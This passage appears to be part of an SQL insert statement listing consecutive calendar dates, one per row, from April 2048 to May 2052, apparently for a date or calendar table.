('2048-04-03'),
('2048-04-04'),
('2048-04-05'),
('2048-04-06'),
('2048-04-07'),
('2048-04-08'),
('2048-04-09'),
('2048-04-10'),
('2048-04-11'),
('2048-04-12'),
('2048-04-13'),
('2048-04-14'),
('2048-04-15'),
('2048-04-16'),
('2048-04-17'),
('2048-04-18'),
('2048-04-19'),
('2048-04-20'),
('2048-04-21'),
('2048-04-22'),
('2048-04-23'),
('2048-04-24'),
('2048-04-25'),
('2048-04-26'),
('2048-04-27'),
('2048-04-28'),
('2048-04-29'),
('2048-04-30'),
('2048-05-01'),
('2048-05-02'),
('2048-05-03'),
('2048-05-04'),
('2048-05-05'),
('2048-05-06'),
('2048-05-07'),
('2048-05-08'),
('2048-05-09'),
('2048-05-10'),
('2048-05-11'),
('2048-05-12'),
('2048-05-13'),
('2048-05-14'),
('2048-05-15'),
('2048-05-16'),
('2048-05-17'),
('2048-05-18'),
('2048-05-19'),
('2048-05-20'),
('2048-05-21'),
('2048-05-22'),
('2048-05-23'),
('2048-05-24'),
('2048-05-25'),
('2048-05-26'),
('2048-05-27'),
('2048-05-28'),
('2048-05-29'),
('2048-05-30'),
('2048-05-31'),
('2048-06-01'),
('2048-06-02'),
('2048-06-03'),
('2048-06-04'),
('2048-06-05'),
('2048-06-06'),
('2048-06-07'),
('2048-06-08'),
('2048-06-09'),
('2048-06-10'),
('2048-06-11'),
('2048-06-12'),
('2048-06-13'),
('2048-06-14'),
('2048-06-15'),
('2048-06-16'),
('2048-06-17'),
('2048-06-18'),
('2048-06-19'),
('2048-06-20'),
('2048-06-21'),
('2048-06-22'),
('2048-06-23'),
('2048-06-24'),
('2048-06-25'),
('2048-06-26'),
('2048-06-27'),
('2048-06-28'),
('2048-06-29'),
('2048-06-30'),
('2048-07-01'),
('2048-07-02'),
('2048-07-03'),
('2048-07-04'),
('2048-07-05'),
('2048-07-06'),
('2048-07-07'),
('2048-07-08'),
('2048-07-09'),
('2048-07-10'),
('2048-07-11'),
('2048-07-12'),
('2048-07-13'),
('2048-07-14'),
('2048-07-15'),
('2048-07-16'),
('2048-07-17'),
('2048-07-18'),
('2048-07-19'),
('2048-07-20'),
('2048-07-21'),
('2048-07-22'),
('2048-07-23'),
('2048-07-24'),
('2048-07-25'),
('2048-07-26'),
('2048-07-27'),
('2048-07-28'),
('2048-07-29'),
('2048-07-30'),
('2048-07-31'),
('2048-08-01'),
('2048-08-02'),
('2048-08-03'),
('2048-08-04'),
('2048-08-05'),
('2048-08-06'),
('2048-08-07'),
('2048-08-08'),
('2048-08-09'),
('2048-08-10'),
('2048-08-11'),
('2048-08-12'),
('2048-08-13'),
('2048-08-14'),
('2048-08-15'),
('2048-08-16'),
('2048-08-17'),
('2048-08-18'),
('2048-08-19'),
('2048-08-20'),
('2048-08-21'),
('2048-08-22'),
('2048-08-23'),
('2048-08-24'),
('2048-08-25'),
('2048-08-26'),
('2048-08-27'),
('2048-08-28'),
('2048-08-29'),
('2048-08-30'),
('2048-08-31'),
('2048-09-01'),
('2048-09-02'),
('2048-09-03'),
('2048-09-04'),
('2048-09-05'),
('2048-09-06'),
('2048-09-07'),
('2048-09-08'),
('2048-09-09'),
('2048-09-10'),
('2048-09-11'),
('2048-09-12'),
('2048-09-13'),
('2048-09-14'),
('2048-09-15'),
('2048-09-16'),
('2048-09-17'),
('2048-09-18'),
('2048-09-19'),
('2048-09-20'),
('2048-09-21'),
('2048-09-22'),
('2048-09-23'),
('2048-09-24'),
('2048-09-25'),
('2048-09-26'),
('2048-09-27'),
('2048-09-28'),
('2048-09-29'),
('2048-09-30'),
('2048-10-01'),
('2048-10-02'),
('2048-10-03'),
('2048-10-04'),
('2048-10-05'),
('2048-10-06'),
('2048-10-07'),
('2048-10-08'),
('2048-10-09'),
('2048-10-10'),
('2048-10-11'),
('2048-10-12'),
('2048-10-13'),
('2048-10-14'),
('2048-10-15'),
('2048-10-16'),
('2048-10-17'),
('2048-10-18'),
('2048-10-19'),
('2048-10-20'),
('2048-10-21'),
('2048-10-22'),
('2048-10-23'),
('2048-10-24'),
('2048-10-25'),
('2048-10-26'),
('2048-10-27'),
('2048-10-28'),
('2048-10-29'),
('2048-10-30'),
('2048-10-31'),
('2048-11-01'),
('2048-11-02'),
('2048-11-03'),
('2048-11-04'),
('2048-11-05'),
('2048-11-06'),
('2048-11-07'),
('2048-11-08'),
('2048-11-09'),
('2048-11-10'),
('2048-11-11'),
('2048-11-12'),
('2048-11-13'),
('2048-11-14'),
('2048-11-15'),
('2048-11-16'),
('2048-11-17'),
('2048-11-18'),
('2048-11-19'),
('2048-11-20'),
('2048-11-21'),
('2048-11-22'),
('2048-11-23'),
('2048-11-24'),
('2048-11-25'),
('2048-11-26'),
('2048-11-27'),
('2048-11-28'),
('2048-11-29'),
('2048-11-30'),
('2048-12-01'),
('2048-12-02'),
('2048-12-03'),
('2048-12-04'),
('2048-12-05'),
('2048-12-06'),
('2048-12-07'),
('2048-12-08'),
('2048-12-09'),
('2048-12-10'),
('2048-12-11'),
('2048-12-12'),
('2048-12-13'),
('2048-12-14'),
('2048-12-15'),
('2048-12-16'),
('2048-12-17'),
('2048-12-18'),
('2048-12-19'),
('2048-12-20'),
('2048-12-21'),
('2048-12-22'),
('2048-12-23'),
('2048-12-24'),
('2048-12-25'),
('2048-12-26'),
('2048-12-27'),
('2048-12-28'),
('2048-12-29'),
('2048-12-30'),
('2048-12-31'),
('2049-01-01'),
('2049-01-02'),
('2049-01-03'),
('2049-01-04'),
('2049-01-05'),
('2049-01-06'),
('2049-01-07'),
('2049-01-08'),
('2049-01-09'),
('2049-01-10'),
('2049-01-11'),
('2049-01-12'),
('2049-01-13'),
('2049-01-14'),
('2049-01-15'),
('2049-01-16'),
('2049-01-17'),
('2049-01-18'),
('2049-01-19'),
('2049-01-20'),
('2049-01-21'),
('2049-01-22'),
('2049-01-23'),
('2049-01-24'),
('2049-01-25'),
('2049-01-26'),
('2049-01-27'),
('2049-01-28'),
('2049-01-29'),
('2049-01-30'),
('2049-01-31'),
('2049-02-01'),
('2049-02-02'),
('2049-02-03'),
('2049-02-04'),
('2049-02-05'),
('2049-02-06'),
('2049-02-07'),
('2049-02-08'),
('2049-02-09'),
('2049-02-10'),
('2049-02-11'),
('2049-02-12'),
('2049-02-13'),
('2049-02-14'),
('2049-02-15'),
('2049-02-16'),
('2049-02-17'),
('2049-02-18'),
('2049-02-19'),
('2049-02-20'),
('2049-02-21'),
('2049-02-22'),
('2049-02-23'),
('2049-02-24'),
('2049-02-25'),
('2049-02-26'),
('2049-02-27'),
('2049-02-28'),
('2049-03-01'),
('2049-03-02'),
('2049-03-03'),
('2049-03-04'),
('2049-03-05'),
('2049-03-06'),
('2049-03-07'),
('2049-03-08'),
('2049-03-09'),
('2049-03-10'),
('2049-03-11'),
('2049-03-12'),
('2049-03-13'),
('2049-03-14'),
('2049-03-15'),
('2049-03-16'),
('2049-03-17'),
('2049-03-18'),
('2049-03-19'),
('2049-03-20'),
('2049-03-21'),
('2049-03-22'),
('2049-03-23'),
('2049-03-24'),
('2049-03-25'),
('2049-03-26'),
('2049-03-27'),
('2049-03-28'),
('2049-03-29'),
('2049-03-30'),
('2049-03-31'),
('2049-04-01'),
('2049-04-02'),
('2049-04-03'),
('2049-04-04'),
('2049-04-05'),
('2049-04-06'),
('2049-04-07'),
('2049-04-08'),
('2049-04-09'),
('2049-04-10'),
('2049-04-11'),
('2049-04-12'),
('2049-04-13'),
('2049-04-14'),
('2049-04-15'),
('2049-04-16'),
('2049-04-17'),
('2049-04-18'),
('2049-04-19'),
('2049-04-20'),
('2049-04-21'),
('2049-04-22'),
('2049-04-23'),
('2049-04-24'),
('2049-04-25'),
('2049-04-26'),
('2049-04-27'),
('2049-04-28'),
('2049-04-29'),
('2049-04-30'),
('2049-05-01'),
('2049-05-02'),
('2049-05-03'),
('2049-05-04'),
('2049-05-05'),
('2049-05-06'),
('2049-05-07'),
('2049-05-08'),
('2049-05-09'),
('2049-05-10'),
('2049-05-11'),
('2049-05-12'),
('2049-05-13'),
('2049-05-14'),
('2049-05-15'),
('2049-05-16'),
('2049-05-17'),
('2049-05-18'),
('2049-05-19'),
('2049-05-20'),
('2049-05-21'),
('2049-05-22'),
('2049-05-23'),
('2049-05-24'),
('2049-05-25'),
('2049-05-26'),
('2049-05-27'),
('2049-05-28'),
('2049-05-29'),
('2049-05-30'),
('2049-05-31'),
('2049-06-01'),
('2049-06-02'),
('2049-06-03'),
('2049-06-04'),
('2049-06-05'),
('2049-06-06'),
('2049-06-07'),
('2049-06-08'),
('2049-06-09'),
('2049-06-10'),
('2049-06-11'),
('2049-06-12'),
('2049-06-13'),
('2049-06-14'),
('2049-06-15'),
('2049-06-16'),
('2049-06-17'),
('2049-06-18'),
('2049-06-19'),
('2049-06-20'),
('2049-06-21'),
('2049-06-22'),
('2049-06-23'),
('2049-06-24'),
('2049-06-25'),
('2049-06-26'),
('2049-06-27'),
('2049-06-28'),
('2049-06-29'),
('2049-06-30'),
('2049-07-01'),
('2049-07-02'),
('2049-07-03'),
('2049-07-04'),
('2049-07-05'),
('2049-07-06'),
('2049-07-07'),
('2049-07-08'),
('2049-07-09'),
('2049-07-10'),
('2049-07-11'),
('2049-07-12'),
('2049-07-13'),
('2049-07-14'),
('2049-07-15'),
('2049-07-16'),
('2049-07-17'),
('2049-07-18'),
('2049-07-19'),
('2049-07-20'),
('2049-07-21'),
('2049-07-22'),
('2049-07-23'),
('2049-07-24'),
('2049-07-25'),
('2049-07-26'),
('2049-07-27'),
('2049-07-28'),
('2049-07-29'),
('2049-07-30'),
('2049-07-31'),
('2049-08-01'),
('2049-08-02'),
('2049-08-03'),
('2049-08-04'),
('2049-08-05'),
('2049-08-06'),
('2049-08-07'),
('2049-08-08'),
('2049-08-09'),
('2049-08-10'),
('2049-08-11'),
('2049-08-12'),
('2049-08-13'),
('2049-08-14'),
('2049-08-15'),
('2049-08-16'),
('2049-08-17'),
('2049-08-18'),
('2049-08-19'),
('2049-08-20'),
('2049-08-21'),
('2049-08-22'),
('2049-08-23'),
('2049-08-24'),
('2049-08-25'),
('2049-08-26'),
('2049-08-27'),
('2049-08-28'),
('2049-08-29'),
('2049-08-30'),
('2049-08-31'),
('2049-09-01'),
('2049-09-02'),
('2049-09-03'),
('2049-09-04'),
('2049-09-05'),
('2049-09-06'),
('2049-09-07'),
('2049-09-08'),
('2049-09-09'),
('2049-09-10'),
('2049-09-11'),
('2049-09-12'),
('2049-09-13'),
('2049-09-14'),
('2049-09-15'),
('2049-09-16'),
('2049-09-17'),
('2049-09-18'),
('2049-09-19'),
('2049-09-20'),
('2049-09-21'),
('2049-09-22'),
('2049-09-23'),
('2049-09-24'),
('2049-09-25'),
('2049-09-26'),
('2049-09-27'),
('2049-09-28'),
('2049-09-29'),
('2049-09-30'),
('2049-10-01'),
('2049-10-02'),
('2049-10-03'),
('2049-10-04'),
('2049-10-05'),
('2049-10-06'),
('2049-10-07'),
('2049-10-08'),
('2049-10-09'),
('2049-10-10'),
('2049-10-11'),
('2049-10-12'),
('2049-10-13'),
('2049-10-14'),
('2049-10-15'),
('2049-10-16'),
('2049-10-17'),
('2049-10-18'),
('2049-10-19'),
('2049-10-20'),
('2049-10-21'),
('2049-10-22'),
('2049-10-23'),
('2049-10-24'),
('2049-10-25'),
('2049-10-26'),
('2049-10-27'),
('2049-10-28'),
('2049-10-29'),
('2049-10-30'),
('2049-10-31'),
('2049-11-01'),
('2049-11-02'),
('2049-11-03'),
('2049-11-04'),
('2049-11-05'),
('2049-11-06'),
('2049-11-07'),
('2049-11-08'),
('2049-11-09'),
('2049-11-10'),
('2049-11-11'),
('2049-11-12'),
('2049-11-13'),
('2049-11-14'),
('2049-11-15'),
('2049-11-16'),
('2049-11-17'),
('2049-11-18'),
('2049-11-19'),
('2049-11-20'),
('2049-11-21'),
('2049-11-22'),
('2049-11-23'),
('2049-11-24'),
('2049-11-25'),
('2049-11-26'),
('2049-11-27'),
('2049-11-28'),
('2049-11-29'),
('2049-11-30'),
('2049-12-01'),
('2049-12-02'),
('2049-12-03'),
('2049-12-04'),
('2049-12-05'),
('2049-12-06'),
('2049-12-07'),
('2049-12-08'),
('2049-12-09'),
('2049-12-10'),
('2049-12-11'),
('2049-12-12'),
('2049-12-13'),
('2049-12-14'),
('2049-12-15'),
('2049-12-16'),
('2049-12-17'),
('2049-12-18'),
('2049-12-19'),
('2049-12-20'),
('2049-12-21'),
('2049-12-22'),
('2049-12-23'),
('2049-12-24'),
('2049-12-25'),
('2049-12-26'),
('2049-12-27'),
('2049-12-28'),
('2049-12-29'),
('2049-12-30'),
('2049-12-31'),
('2050-01-01'),
('2050-01-02'),
('2050-01-03'),
('2050-01-04'),
('2050-01-05'),
('2050-01-06'),
('2050-01-07'),
('2050-01-08'),
('2050-01-09'),
('2050-01-10'),
('2050-01-11'),
('2050-01-12'),
('2050-01-13'),
('2050-01-14'),
('2050-01-15'),
('2050-01-16'),
('2050-01-17'),
('2050-01-18'),
('2050-01-19'),
('2050-01-20'),
('2050-01-21'),
('2050-01-22'),
('2050-01-23'),
('2050-01-24'),
('2050-01-25'),
('2050-01-26'),
('2050-01-27'),
('2050-01-28'),
('2050-01-29'),
('2050-01-30'),
('2050-01-31'),
('2050-02-01'),
('2050-02-02'),
('2050-02-03'),
('2050-02-04'),
('2050-02-05'),
('2050-02-06'),
('2050-02-07'),
('2050-02-08'),
('2050-02-09'),
('2050-02-10'),
('2050-02-11'),
('2050-02-12'),
('2050-02-13'),
('2050-02-14'),
('2050-02-15'),
('2050-02-16'),
('2050-02-17'),
('2050-02-18'),
('2050-02-19'),
('2050-02-20'),
('2050-02-21'),
('2050-02-22'),
('2050-02-23'),
('2050-02-24'),
('2050-02-25'),
('2050-02-26'),
('2050-02-27'),
('2050-02-28'),
('2050-03-01'),
('2050-03-02'),
('2050-03-03'),
('2050-03-04'),
('2050-03-05'),
('2050-03-06'),
('2050-03-07'),
('2050-03-08'),
('2050-03-09'),
('2050-03-10'),
('2050-03-11'),
('2050-03-12'),
('2050-03-13'),
('2050-03-14'),
('2050-03-15'),
('2050-03-16'),
('2050-03-17'),
('2050-03-18'),
('2050-03-19'),
('2050-03-20'),
('2050-03-21'),
('2050-03-22'),
('2050-03-23'),
('2050-03-24'),
('2050-03-25'),
('2050-03-26'),
('2050-03-27'),
('2050-03-28'),
('2050-03-29'),
('2050-03-30'),
('2050-03-31'),
('2050-04-01'),
('2050-04-02'),
('2050-04-03'),
('2050-04-04'),
('2050-04-05'),
('2050-04-06'),
('2050-04-07'),
('2050-04-08'),
('2050-04-09'),
('2050-04-10'),
('2050-04-11'),
('2050-04-12'),
('2050-04-13'),
('2050-04-14'),
('2050-04-15'),
('2050-04-16'),
('2050-04-17'),
('2050-04-18'),
('2050-04-19'),
('2050-04-20'),
('2050-04-21'),
('2050-04-22'),
('2050-04-23'),
('2050-04-24'),
('2050-04-25'),
('2050-04-26'),
('2050-04-27'),
('2050-04-28'),
('2050-04-29'),
('2050-04-30'),
('2050-05-01'),
('2050-05-02'),
('2050-05-03'),
('2050-05-04'),
('2050-05-05'),
('2050-05-06'),
('2050-05-07'),
('2050-05-08'),
('2050-05-09'),
('2050-05-10'),
('2050-05-11'),
('2050-05-12'),
('2050-05-13'),
('2050-05-14'),
('2050-05-15'),
('2050-05-16'),
('2050-05-17'),
('2050-05-18'),
('2050-05-19'),
('2050-05-20'),
('2050-05-21'),
('2050-05-22'),
('2050-05-23'),
('2050-05-24'),
('2050-05-25'),
('2050-05-26'),
('2050-05-27'),
('2050-05-28'),
('2050-05-29'),
('2050-05-30'),
('2050-05-31'),
('2050-06-01'),
('2050-06-02'),
('2050-06-03'),
('2050-06-04'),
('2050-06-05'),
('2050-06-06'),
('2050-06-07'),
('2050-06-08'),
('2050-06-09'),
('2050-06-10'),
('2050-06-11'),
('2050-06-12'),
('2050-06-13'),
('2050-06-14'),
('2050-06-15'),
('2050-06-16'),
('2050-06-17'),
('2050-06-18'),
('2050-06-19'),
('2050-06-20'),
('2050-06-21'),
('2050-06-22'),
('2050-06-23'),
('2050-06-24'),
('2050-06-25'),
('2050-06-26'),
('2050-06-27'),
('2050-06-28'),
('2050-06-29'),
('2050-06-30'),
('2050-07-01'),
('2050-07-02'),
('2050-07-03'),
('2050-07-04'),
('2050-07-05'),
('2050-07-06'),
('2050-07-07'),
('2050-07-08'),
('2050-07-09'),
('2050-07-10'),
('2050-07-11'),
('2050-07-12'),
('2050-07-13'),
('2050-07-14'),
('2050-07-15'),
('2050-07-16'),
('2050-07-17'),
('2050-07-18'),
('2050-07-19'),
('2050-07-20'),
('2050-07-21'),
('2050-07-22'),
('2050-07-23'),
('2050-07-24'),
('2050-07-25'),
('2050-07-26'),
('2050-07-27'),
('2050-07-28'),
('2050-07-29'),
('2050-07-30'),
('2050-07-31'),
('2050-08-01'),
('2050-08-02'),
('2050-08-03'),
('2050-08-04'),
('2050-08-05'),
('2050-08-06'),
('2050-08-07'),
('2050-08-08'),
('2050-08-09'),
('2050-08-10'),
('2050-08-11'),
('2050-08-12'),
('2050-08-13'),
('2050-08-14'),
('2050-08-15'),
('2050-08-16'),
('2050-08-17'),
('2050-08-18'),
('2050-08-19'),
('2050-08-20'),
('2050-08-21'),
('2050-08-22'),
('2050-08-23'),
('2050-08-24'),
('2050-08-25'),
('2050-08-26'),
('2050-08-27'),
('2050-08-28'),
('2050-08-29'),
('2050-08-30'),
('2050-08-31'),
('2050-09-01'),
('2050-09-02'),
('2050-09-03'),
('2050-09-04'),
('2050-09-05'),
('2050-09-06'),
('2050-09-07'),
('2050-09-08'),
('2050-09-09'),
('2050-09-10'),
('2050-09-11'),
('2050-09-12'),
('2050-09-13'),
('2050-09-14'),
('2050-09-15'),
('2050-09-16'),
('2050-09-17'),
('2050-09-18'),
('2050-09-19'),
('2050-09-20'),
('2050-09-21'),
('2050-09-22'),
('2050-09-23'),
('2050-09-24'),
('2050-09-25'),
('2050-09-26'),
('2050-09-27'),
('2050-09-28'),
('2050-09-29'),
('2050-09-30'),
('2050-10-01'),
('2050-10-02'),
('2050-10-03'),
('2050-10-04'),
('2050-10-05'),
('2050-10-06'),
('2050-10-07'),
('2050-10-08'),
('2050-10-09'),
('2050-10-10'),
('2050-10-11'),
('2050-10-12'),
('2050-10-13'),
('2050-10-14'),
('2050-10-15'),
('2050-10-16'),
('2050-10-17'),
('2050-10-18'),
('2050-10-19'),
('2050-10-20'),
('2050-10-21'),
('2050-10-22'),
('2050-10-23'),
('2050-10-24'),
('2050-10-25'),
('2050-10-26'),
('2050-10-27'),
('2050-10-28'),
('2050-10-29'),
('2050-10-30'),
('2050-10-31'),
('2050-11-01'),
('2050-11-02'),
('2050-11-03'),
('2050-11-04'),
('2050-11-05'),
('2050-11-06'),
('2050-11-07'),
('2050-11-08'),
('2050-11-09'),
('2050-11-10'),
('2050-11-11'),
('2050-11-12'),
('2050-11-13'),
('2050-11-14'),
('2050-11-15'),
('2050-11-16'),
('2050-11-17'),
('2050-11-18'),
('2050-11-19'),
('2050-11-20'),
('2050-11-21'),
('2050-11-22'),
('2050-11-23'),
('2050-11-24'),
('2050-11-25'),
('2050-11-26'),
('2050-11-27'),
('2050-11-28'),
('2050-11-29'),
('2050-11-30'),
('2050-12-01'),
('2050-12-02'),
('2050-12-03'),
('2050-12-04'),
('2050-12-05'),
('2050-12-06'),
('2050-12-07'),
('2050-12-08'),
('2050-12-09'),
('2050-12-10'),
('2050-12-11'),
('2050-12-12'),
('2050-12-13'),
('2050-12-14'),
('2050-12-15'),
('2050-12-16'),
('2050-12-17'),
('2050-12-18'),
('2050-12-19'),
('2050-12-20'),
('2050-12-21'),
('2050-12-22'),
('2050-12-23'),
('2050-12-24'),
('2050-12-25'),
('2050-12-26'),
('2050-12-27'),
('2050-12-28'),
('2050-12-29'),
('2050-12-30'),
('2050-12-31'),
('2051-01-01'),
('2051-01-02'),
('2051-01-03'),
('2051-01-04'),
('2051-01-05'),
('2051-01-06'),
('2051-01-07'),
('2051-01-08'),
('2051-01-09'),
('2051-01-10'),
('2051-01-11'),
('2051-01-12'),
('2051-01-13'),
('2051-01-14'),
('2051-01-15'),
('2051-01-16'),
('2051-01-17'),
('2051-01-18'),
('2051-01-19'),
('2051-01-20'),
('2051-01-21'),
('2051-01-22'),
('2051-01-23'),
('2051-01-24'),
('2051-01-25'),
('2051-01-26'),
('2051-01-27'),
('2051-01-28'),
('2051-01-29'),
('2051-01-30'),
('2051-01-31'),
('2051-02-01'),
('2051-02-02'),
('2051-02-03'),
('2051-02-04'),
('2051-02-05'),
('2051-02-06'),
('2051-02-07'),
('2051-02-08'),
('2051-02-09'),
('2051-02-10'),
('2051-02-11'),
('2051-02-12'),
('2051-02-13'),
('2051-02-14'),
('2051-02-15'),
('2051-02-16'),
('2051-02-17'),
('2051-02-18'),
('2051-02-19'),
('2051-02-20'),
('2051-02-21'),
('2051-02-22'),
('2051-02-23'),
('2051-02-24'),
('2051-02-25'),
('2051-02-26'),
('2051-02-27'),
('2051-02-28'),
('2051-03-01'),
('2051-03-02'),
('2051-03-03'),
('2051-03-04'),
('2051-03-05'),
('2051-03-06'),
('2051-03-07'),
('2051-03-08'),
('2051-03-09'),
('2051-03-10'),
('2051-03-11'),
('2051-03-12'),
('2051-03-13'),
('2051-03-14'),
('2051-03-15'),
('2051-03-16'),
('2051-03-17'),
('2051-03-18'),
('2051-03-19'),
('2051-03-20'),
('2051-03-21'),
('2051-03-22'),
('2051-03-23'),
('2051-03-24'),
('2051-03-25'),
('2051-03-26'),
('2051-03-27'),
('2051-03-28'),
('2051-03-29'),
('2051-03-30'),
('2051-03-31'),
('2051-04-01'),
('2051-04-02'),
('2051-04-03'),
('2051-04-04'),
('2051-04-05'),
('2051-04-06'),
('2051-04-07'),
('2051-04-08'),
('2051-04-09'),
('2051-04-10'),
('2051-04-11'),
('2051-04-12'),
('2051-04-13'),
('2051-04-14'),
('2051-04-15'),
('2051-04-16'),
('2051-04-17'),
('2051-04-18'),
('2051-04-19'),
('2051-04-20'),
('2051-04-21'),
('2051-04-22'),
('2051-04-23'),
('2051-04-24'),
('2051-04-25'),
('2051-04-26'),
('2051-04-27'),
('2051-04-28'),
('2051-04-29'),
('2051-04-30'),
('2051-05-01'),
('2051-05-02'),
('2051-05-03'),
('2051-05-04'),
('2051-05-05'),
('2051-05-06'),
('2051-05-07'),
('2051-05-08'),
('2051-05-09'),
('2051-05-10'),
('2051-05-11'),
('2051-05-12'),
('2051-05-13'),
('2051-05-14'),
('2051-05-15'),
('2051-05-16'),
('2051-05-17'),
('2051-05-18'),
('2051-05-19'),
('2051-05-20'),
('2051-05-21'),
('2051-05-22'),
('2051-05-23'),
('2051-05-24'),
('2051-05-25'),
('2051-05-26'),
('2051-05-27'),
('2051-05-28'),
('2051-05-29'),
('2051-05-30'),
('2051-05-31'),
('2051-06-01'),
('2051-06-02'),
('2051-06-03'),
('2051-06-04'),
('2051-06-05'),
('2051-06-06'),
('2051-06-07'),
('2051-06-08'),
('2051-06-09'),
('2051-06-10'),
('2051-06-11'),
('2051-06-12'),
('2051-06-13'),
('2051-06-14'),
('2051-06-15'),
('2051-06-16'),
('2051-06-17'),
('2051-06-18'),
('2051-06-19'),
('2051-06-20'),
('2051-06-21'),
('2051-06-22'),
('2051-06-23'),
('2051-06-24'),
('2051-06-25'),
('2051-06-26'),
('2051-06-27'),
('2051-06-28'),
('2051-06-29'),
('2051-06-30'),
('2051-07-01'),
('2051-07-02'),
('2051-07-03'),
('2051-07-04'),
('2051-07-05'),
('2051-07-06'),
('2051-07-07'),
('2051-07-08'),
('2051-07-09'),
('2051-07-10'),
('2051-07-11'),
('2051-07-12'),
('2051-07-13'),
('2051-07-14'),
('2051-07-15'),
('2051-07-16'),
('2051-07-17'),
('2051-07-18'),
('2051-07-19'),
('2051-07-20'),
('2051-07-21'),
('2051-07-22'),
('2051-07-23'),
('2051-07-24'),
('2051-07-25'),
('2051-07-26'),
('2051-07-27'),
('2051-07-28'),
('2051-07-29'),
('2051-07-30'),
('2051-07-31'),
('2051-08-01'),
('2051-08-02'),
('2051-08-03'),
('2051-08-04'),
('2051-08-05'),
('2051-08-06'),
('2051-08-07'),
('2051-08-08'),
('2051-08-09'),
('2051-08-10'),
('2051-08-11'),
('2051-08-12'),
('2051-08-13'),
('2051-08-14'),
('2051-08-15'),
('2051-08-16'),
('2051-08-17'),
('2051-08-18'),
('2051-08-19'),
('2051-08-20'),
('2051-08-21'),
('2051-08-22'),
('2051-08-23'),
('2051-08-24'),
('2051-08-25'),
('2051-08-26'),
('2051-08-27'),
('2051-08-28'),
('2051-08-29'),
('2051-08-30'),
('2051-08-31'),
('2051-09-01'),
('2051-09-02'),
('2051-09-03'),
('2051-09-04'),
('2051-09-05'),
('2051-09-06'),
('2051-09-07'),
('2051-09-08'),
('2051-09-09'),
('2051-09-10'),
('2051-09-11'),
('2051-09-12'),
('2051-09-13'),
('2051-09-14'),
('2051-09-15'),
('2051-09-16'),
('2051-09-17'),
('2051-09-18'),
('2051-09-19'),
('2051-09-20'),
('2051-09-21'),
('2051-09-22'),
('2051-09-23'),
('2051-09-24'),
('2051-09-25'),
('2051-09-26'),
('2051-09-27'),
('2051-09-28'),
('2051-09-29'),
('2051-09-30'),
('2051-10-01'),
('2051-10-02'),
('2051-10-03'),
('2051-10-04'),
('2051-10-05'),
('2051-10-06'),
('2051-10-07'),
('2051-10-08'),
('2051-10-09'),
('2051-10-10'),
('2051-10-11'),
('2051-10-12'),
('2051-10-13'),
('2051-10-14'),
('2051-10-15'),
('2051-10-16'),
('2051-10-17'),
('2051-10-18'),
('2051-10-19'),
('2051-10-20'),
('2051-10-21'),
('2051-10-22'),
('2051-10-23'),
('2051-10-24'),
('2051-10-25'),
('2051-10-26'),
('2051-10-27'),
('2051-10-28'),
('2051-10-29'),
('2051-10-30'),
('2051-10-31'),
('2051-11-01'),
('2051-11-02'),
('2051-11-03'),
('2051-11-04'),
('2051-11-05'),
('2051-11-06'),
('2051-11-07'),
('2051-11-08'),
('2051-11-09'),
('2051-11-10'),
('2051-11-11'),
('2051-11-12'),
('2051-11-13'),
('2051-11-14'),
('2051-11-15'),
('2051-11-16'),
('2051-11-17'),
('2051-11-18'),
('2051-11-19'),
('2051-11-20'),
('2051-11-21'),
('2051-11-22'),
('2051-11-23'),
('2051-11-24'),
('2051-11-25'),
('2051-11-26'),
('2051-11-27'),
('2051-11-28'),
('2051-11-29'),
('2051-11-30'),
('2051-12-01'),
('2051-12-02'),
('2051-12-03'),
('2051-12-04'),
('2051-12-05'),
('2051-12-06'),
('2051-12-07'),
('2051-12-08'),
('2051-12-09'),
('2051-12-10'),
('2051-12-11'),
('2051-12-12'),
('2051-12-13'),
('2051-12-14'),
('2051-12-15'),
('2051-12-16'),
('2051-12-17'),
('2051-12-18'),
('2051-12-19'),
('2051-12-20'),
('2051-12-21'),
('2051-12-22'),
('2051-12-23'),
('2051-12-24'),
('2051-12-25'),
('2051-12-26'),
('2051-12-27'),
('2051-12-28'),
('2051-12-29'),
('2051-12-30'),
('2051-12-31'),
('2052-01-01'),
('2052-01-02'),
('2052-01-03'),
('2052-01-04'),
('2052-01-05'),
('2052-01-06'),
('2052-01-07'),
('2052-01-08'),
('2052-01-09'),
('2052-01-10'),
('2052-01-11'),
('2052-01-12'),
('2052-01-13'),
('2052-01-14'),
('2052-01-15'),
('2052-01-16'),
('2052-01-17'),
('2052-01-18'),
('2052-01-19'),
('2052-01-20'),
('2052-01-21'),
('2052-01-22'),
('2052-01-23'),
('2052-01-24'),
('2052-01-25'),
('2052-01-26'),
('2052-01-27'),
('2052-01-28'),
('2052-01-29'),
('2052-01-30'),
('2052-01-31'),
('2052-02-01'),
('2052-02-02'),
('2052-02-03'),
('2052-02-04'),
('2052-02-05'),
('2052-02-06'),
('2052-02-07'),
('2052-02-08'),
('2052-02-09'),
('2052-02-10'),
('2052-02-11'),
('2052-02-12'),
('2052-02-13'),
('2052-02-14'),
('2052-02-15'),
('2052-02-16'),
('2052-02-17'),
('2052-02-18'),
('2052-02-19'),
('2052-02-20'),
('2052-02-21'),
('2052-02-22'),
('2052-02-23'),
('2052-02-24'),
('2052-02-25'),
('2052-02-26'),
('2052-02-27'),
('2052-02-28'),
('2052-02-29'),
('2052-03-01'),
('2052-03-02'),
('2052-03-03'),
('2052-03-04'),
('2052-03-05'),
('2052-03-06'),
('2052-03-07'),
('2052-03-08'),
('2052-03-09'),
('2052-03-10'),
('2052-03-11'),
('2052-03-12'),
('2052-03-13'),
('2052-03-14'),
('2052-03-15'),
('2052-03-16'),
('2052-03-17'),
('2052-03-18'),
('2052-03-19'),
('2052-03-20'),
('2052-03-21'),
('2052-03-22'),
('2052-03-23'),
('2052-03-24'),
('2052-03-25'),
('2052-03-26'),
('2052-03-27'),
('2052-03-28'),
('2052-03-29'),
('2052-03-30'),
('2052-03-31'),
('2052-04-01'),
('2052-04-02'),
('2052-04-03'),
('2052-04-04'),
('2052-04-05'),
('2052-04-06'),
('2052-04-07'),
('2052-04-08'),
('2052-04-09'),
('2052-04-10'),
('2052-04-11'),
('2052-04-12'),
('2052-04-13'),
('2052-04-14'),
('2052-04-15'),
('2052-04-16'),
('2052-04-17'),
('2052-04-18'),
('2052-04-19'),
('2052-04-20'),
('2052-04-21'),
('2052-04-22'),
('2052-04-23'),
('2052-04-24'),
('2052-04-25'),
('2052-04-26'),
('2052-04-27'),
('2052-04-28'),
('2052-04-29'),
('2052-04-30'),
('2052-05-01'),
('2052-05-02'),
('2052-05-03'),
('2052-05-04'),
('2052-05-05'),
('2052-05-06'),
('2052-05-07'),
('2052-05-08'),
('2052-05-09'),
('2052-05-10'),
('2052-05-11'),
